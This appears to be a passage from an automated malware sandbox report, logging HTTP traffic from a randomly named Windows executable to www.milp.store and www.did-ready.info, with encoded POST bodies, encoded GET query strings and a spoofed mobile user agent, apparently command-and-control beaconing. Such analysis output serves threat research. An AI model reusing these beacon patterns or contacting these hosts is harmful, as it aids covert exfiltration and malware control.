                                                                                                                    Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                                                                                                    Jan 10, 2025 20:49:55.362938881 CET1236INData Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20
                                                                                                                    Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
                                                                                                                    Jan 10, 2025 20:49:55.362951040 CET1236INData Raw: 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e
                                                                                                                    Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
                                                                                                                    Jan 10, 2025 20:49:55.362962008 CET1236INData Raw: 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 46 69 6e 64 20 79 6f 75 72 20 64 65 73 69 72 65 64 20 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 09 3c 62 75 74 74 6f 6e 20 69 64 3d 22 73 65 61 72 63 68 2d 62 74 6e 22 20 63 6c 61 73 73 3d 22 62 74 6e
                                                                                                                    Data Ascii: t" placeholder="Find your desired domain"><button id="search-btn" class="btn btn-search" type="submit"></button></form></div><h3>Get full control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able
                                                                                                                    Jan 10, 2025 20:49:55.362974882 CET878INData Raw: 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 73 69 74 65 62 75 69 6c 64 65 72 22 3e 43 72 65 61 74 65 20 79 6f 75 72 20 77 65 62 73 69 74 65 20 77 69 74 68
                                                                                                                    Data Ascii: rkingweb&utm_campaign=parkingweb&utm_content=sitebuilder">Create your website with Loopia Sitebuilder</a></li></ul></p><a href="https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    15192.168.2.650002194.9.94.86802196C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 10, 2025 20:49:57.195400953 CET1867OUTPOST /oqbp/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.milp.store
                                                                                                                    Origin: http://www.milp.store
                                                                                                                    Referer: http://www.milp.store/oqbp/
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 1247
                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; LG-D722 Build/LRX22G.A1429531854) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/34.0.1847.118 Mobile Safari/537.36
                                                                                                                    Data Raw: 6e 7a 73 30 54 32 3d 71 58 31 44 33 45 42 37 77 77 42 4d 2f 57 46 52 52 5a 6a 69 50 79 33 56 6d 43 63 63 37 6e 46 6f 70 2f 6a 4c 50 56 37 41 41 42 4e 64 73 48 65 43 4c 4e 58 72 49 6d 7a 52 6e 49 57 75 64 31 37 77 41 70 66 59 57 69 4f 78 59 2b 6b 55 61 2b 4c 44 49 73 63 6a 59 72 48 70 51 66 41 41 63 61 67 74 45 71 75 63 4d 35 47 74 65 71 65 6a 79 39 4b 75 64 62 73 64 44 6f 33 30 4f 66 67 2b 6b 65 6c 76 32 41 64 6f 53 30 50 6b 53 64 37 4d 63 42 77 37 35 43 78 47 49 54 52 56 53 4f 46 59 49 49 72 4b 6d 44 55 54 36 69 59 6d 30 67 59 76 67 42 65 79 64 74 7a 58 63 66 49 79 45 47 4c 42 68 59 6e 6b 58 59 70 33 6d 51 44 34 77 6b 46 67 42 6c 30 57 36 4e 43 59 6a 53 32 31 65 31 73 37 31 39 32 55 62 32 56 55 41 56 45 57 43 6a 59 44 78 51 57 68 55 48 4c 56 77 31 66 67 50 61 78 45 41 5a 76 73 76 30 49 59 6c 73 51 37 66 31 61 7a 77 4b 78 39 42 58 47 39 6d 2b 65 78 34 64 67 66 6f 7a 59 4d 61 32 61 62 71 56 57 50 31 59 77 32 72 44 4d 44 43 57 43 36 6c 44 30 58 6e 6a 38 54 42 65 56 36 77 39 48 5a 48 2b 47 76 6b 44 37 [TRUNCATED]
                                                                                                                    Data Ascii: nzs0T2=qX1D3EB7wwBM/WFRRZjiPy3VmCcc7nFop/jLPV7AABNdsHeCLNXrImzRnIWud17wApfYWiOxY+kUa+LDIscjYrHpQfAAcagtEqucM5Gteqejy9KudbsdDo30Ofg+kelv2AdoS0PkSd7McBw75CxGITRVSOFYIIrKmDUT6iYm0gYvgBeydtzXcfIyEGLBhYnkXYp3mQD4wkFgBl0W6NCYjS21e1s7192Ub2VUAVEWCjYDxQWhUHLVw1fgPaxEAZvsv0IYlsQ7f1azwKx9BXG9m+ex4dgfozYMa2abqVWP1Yw2rDMDCWC6lD0Xnj8TBeV6w9HZH+GvkD7BHGRIVFGoCtWHPNXaaw1wsvqUvpzqr2BQnWTKsoDVa/aeCJ6RuaZfelxr2dzeoKZSuaIrRsu30rYaDMcZ2uqq3szRPHfUfB5C4qk/7WCq5YR5b0e+WCg3ryn3nkcsmR02Sx+8BzFLG1FZEhZc5RTqTdww1b+D3y5wT/eNFIoU2RquTW8KY2VtOMdwGTo5WQ9hl7ZBPnITKh0M+LO7jPTd+ELQw4VZzbk/wXY30ipKF99swzXJ17Lzxlragdm0272YGVx/Nxv8pReLVYEYjf0lAQbPSReWFRD+j9dV6ajWgHJ2uPjFQnvxfPjzHmW7313RalKz7qBqU3sSsl06tflYk4l0zinLrIe91vFvOdOUpziPlde3jkD64Wr7nWxveZdwW5/kLzQsTwMGR/iciqSHgYXcTHaY72YCIPl09Wv4SelqkiygGYfLSK2AgCieuLnd+BQWWrxS2jsDE+gXbkS1kwtdKzNM0No3NEajabrqb/bG8d0/uLuyiWEK8rB/ILkOE7ou5jXoX9f87KWhtxz3qVqKBasYfG+45laiJfZilsxt6xNqksU/W8FVBabP++NvxKm4UGhwewPV5vQ2huNmzd07PVTx4jympb6BzXRP4S54ETVXFIYbkAYJRCml2jASGGBUEavOux6xfM3CyFGm5xxjlggVWbd4h [TRUNCATED]
                                                                                                                    Jan 10, 2025 20:49:57.836009026 CET1236INHTTP/1.1 200 OK
                                                                                                                    Server: nginx
                                                                                                                    Date: Fri, 10 Jan 2025 19:49:57 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/8.1.30
                                                                                                                    Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
                                                                                                                    Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                                                                                                    Jan 10, 2025 20:49:57.836025953 CET1236INData Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20
                                                                                                                    Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
                                                                                                                    Jan 10, 2025 20:49:57.836033106 CET1236INData Raw: 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e
                                                                                                                    Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
                                                                                                                    Jan 10, 2025 20:49:57.836039066 CET1236INData Raw: 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 46 69 6e 64 20 79 6f 75 72 20 64 65 73 69 72 65 64 20 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 09 3c 62 75 74 74 6f 6e 20 69 64 3d 22 73 65 61 72 63 68 2d 62 74 6e 22 20 63 6c 61 73 73 3d 22 62 74 6e
                                                                                                                    Data Ascii: t" placeholder="Find your desired domain"><button id="search-btn" class="btn btn-search" type="submit"></button></form></div><h3>Get full control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able
                                                                                                                    Jan 10, 2025 20:49:57.836047888 CET878INData Raw: 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 73 69 74 65 62 75 69 6c 64 65 72 22 3e 43 72 65 61 74 65 20 79 6f 75 72 20 77 65 62 73 69 74 65 20 77 69 74 68
                                                                                                                    Data Ascii: rkingweb&utm_campaign=parkingweb&utm_content=sitebuilder">Create your website with Loopia Sitebuilder</a></li></ul></p><a href="https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    16192.168.2.650004194.9.94.86802196C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 10, 2025 20:49:59.736903906 CET581OUTGET /oqbp/?nzs0T2=nVdj0w1j4FwXyGo+Obq+FyeO6yYPj1Biv/jBCQDtLkRj70mDH/TDAXa41L+hW2L/B4b9RwzGZeA1aKeiLPIgFZPHXdsTU40dEdaTH5HUY4e23s7HRqJoCIa7IuMIjt9j0jZPQBo=&mLFl=BXYPt2lXBpi8Dj HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.milp.store
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; LG-D722 Build/LRX22G.A1429531854) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/34.0.1847.118 Mobile Safari/537.36
                                                                                                                    Jan 10, 2025 20:50:00.378561974 CET1236INHTTP/1.1 200 OK
                                                                                                                    Server: nginx
                                                                                                                    Date: Fri, 10 Jan 2025 19:50:00 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/8.1.30
                                                                                                                    Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
                                                                                                                    Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                                                                                                    Jan 10, 2025 20:50:00.378587961 CET224INData Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20
                                                                                                                    Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.
                                                                                                                    Jan 10, 2025 20:50:00.378602028 CET1236INData Raw: 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 20 3d 20 31 2e 30 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65
                                                                                                                    Data Ascii: 0, maximum-scale = 1.0, width=device-width" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/responsive/styles/reset.css" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/shared/style/
                                                                                                                    Jan 10, 2025 20:50:00.378614902 CET1236INData Raw: 67 69 6e 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6c 6f 6f 70 69 61 2e 63 6f 6d 2f 6c 6f 67 69 6e 3f 75 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61
                                                                                                                    Data Ascii: gin to <a href="https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=login">Loopia Customer zone</a> and actualize your plan.</p> <div class="divider"></div>
                                                                                                                    Jan 10, 2025 20:50:00.378626108 CET448INData Raw: 53 2c 20 79 6f 75 20 77 69 6c 6c 20 62 65 20 61 62 6c 65 20 74 6f 20 6d 61 6e 61 67 65 20 79 6f 75 72 20 64 6f 6d 61 69 6e 73 20 69 6e 20 6f 6e 65 20 73 69 6e 67 6c 65 20 70 6c 61 63 65 20 69 6e 20 4c 6f 6f 70 69 61 20 43 75 73 74 6f 6d 65 72 20
                                                                                                                    Data Ascii: S, you will be able to manage your domains in one single place in Loopia Customer zone. <a href="https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=dns">Read more at loopia.co
                                                                                                                    Jan 10, 2025 20:50:00.378638983 CET1236INData Raw: 65 74 20 73 74 61 72 74 65 64 20 77 69 74 68 20 79 6f 75 72 20 77 65 62 73 69 74 65 2c 20 65 6d 61 69 6c 2c 20 62 6c 6f 67 20 61 6e 64 20 6f 6e 6c 69 6e 65 20 73 74 6f 72 65 2e 3c 2f 70 3e 0a 09 09 09 3c 70 3e 0a 09 09 09 3c 75 6c 3e 0a 09 09 09
                                                                                                                    Data Ascii: et started with your website, email, blog and online store.</p><p><ul><li><a href="https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=wordpress">Create your websi
                                                                                                                    Jan 10, 2025 20:50:00.378650904 CET206INData Raw: 6c 6f 6f 70 69 61 2e 63 6f 6d 2f 73 75 70 70 6f 72 74 3f 75 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70
                                                                                                                    Data Ascii: loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb">Contact us</a></p></span></div>... /END #footer --></div>... /END .content --></body></html>0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    17192.168.2.650005194.245.148.189802196C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 10, 2025 20:50:05.437649965 CET842OUTPOST /89qa/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.did-ready.info
                                                                                                                    Origin: http://www.did-ready.info
                                                                                                                    Referer: http://www.did-ready.info/89qa/
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 211
                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; LG-D722 Build/LRX22G.A1429531854) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/34.0.1847.118 Mobile Safari/537.36
                                                                                                                    Data Raw: 6e 7a 73 30 54 32 3d 35 72 71 4b 79 6a 62 6b 67 37 65 6e 4b 44 46 54 4f 49 75 4b 41 41 72 55 6d 2f 4f 54 70 57 59 6d 55 31 2f 30 6a 6f 79 50 66 32 66 59 32 6d 78 6c 52 67 48 49 52 50 79 78 50 5a 77 37 66 4e 78 59 42 4d 67 42 49 6d 2f 4f 47 59 7a 52 4c 6e 78 56 5a 48 31 77 4d 58 6e 6a 50 65 77 38 77 30 61 2b 46 31 58 4b 66 2b 31 51 59 66 4a 2b 5a 6c 57 43 6d 79 6d 36 30 56 32 68 52 6e 34 42 69 48 76 4a 47 6e 45 77 5a 5a 35 2b 4a 53 78 6c 7a 52 43 2f 56 41 7a 47 4a 33 35 7a 5a 6d 51 73 46 2b 46 5a 4f 54 45 5a 45 39 69 6e 34 50 32 54 34 72 74 73 62 4c 49 48 41 4e 42 39 4a 32 66 38 68 4b 55 7a 47 77 35 45 58 6d 51 41 75 5a 39 2b
                                                                                                                    Data Ascii: nzs0T2=5rqKyjbkg7enKDFTOIuKAArUm/OTpWYmU1/0joyPf2fY2mxlRgHIRPyxPZw7fNxYBMgBIm/OGYzRLnxVZH1wMXnjPew8w0a+F1XKf+1QYfJ+ZlWCmym60V2hRn4BiHvJGnEwZZ5+JSxlzRC/VAzGJ35zZmQsF+FZOTEZE9in4P2T4rtsbLIHANB9J2f8hKUzGw5EXmQAuZ9+
                                                                                                                    Jan 10, 2025 20:50:06.041709900 CET725INHTTP/1.1 403 Forbidden
                                                                                                                    Server: nginx
                                                                                                                    Date: Fri, 10 Jan 2025 19:50:05 GMT
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 [TRUNCATED]
                                                                                                                    Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    18192.168.2.650006194.245.148.189802196C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 10, 2025 20:50:07.991530895 CET866OUTPOST /89qa/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.did-ready.info
                                                                                                                    Origin: http://www.did-ready.info
                                                                                                                    Referer: http://www.did-ready.info/89qa/
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 235
                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; LG-D722 Build/LRX22G.A1429531854) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/34.0.1847.118 Mobile Safari/537.36
